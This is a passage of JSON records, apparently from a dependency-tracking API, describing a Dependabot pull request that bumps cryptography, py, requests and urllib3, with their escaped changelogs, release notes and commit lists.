href=\"https://redirect.github.com/pypa/virtualenv/issues/2877\"\u003e#2877\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.26.6...20.31.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/zxenonx/zc_messaging/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/zxenonx/zc_messaging/pull/94","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/zxenonx%2Fzc_messaging/issues/94","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/94/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-18T22:51:44.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2603097547","node_id":"PR_kwDOOjqlA86bKB3L","number":1,"state":"closed","title":"build(deps): bump the pip group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":"2025-06-19T14:44:53.000Z","author_association":"NONE","state_reason":null,"created_at":"2025-06-18T22:51:44.000Z","updated_at":"2025-06-19T14:44:53.000Z","time_to_close":57189,"merged_at":"2025-06-19T14:44:53.000Z","merged_by":"Emadalshamery","closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":4,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.19","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 4 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py), [requests](https://github.com/psf/requests) and [urllib3](https://github.com/urllib3/urllib3).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.19 to 2.5.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.5.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eSecurity issues\u003c/h1\u003e\n\u003cp\u003eurllib3 2.5.0 fixes two moderate security issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePool managers now properly control redirects when \u003ccode\u003eretries\u003c/code\u003e is passed — CVE-2025-50181 reported by \u003ca href=\"https://github.com/sandumjacob\"\u003e\u003ccode\u003e@​sandumjacob\u003c/code\u003e\u003c/a\u003e (5.3 Medium, GHSA-pq67-6m6q-mj2v)\u003c/li\u003e\n\u003cli\u003eRedirects are now controlled by urllib3 in the Node.js runtime — CVE-2025-50182 (5.3 Medium, GHSA-48p4-8xcf-vxj5)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14. See \u003ca href=\"https://peps.python.org/pep-0784/\"\u003ePEP 784\u003c/a\u003e for more information. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3610\"\u003e#3610\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3612\"\u003e#3612\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3581\"\u003e#3581\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.4.0\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ca 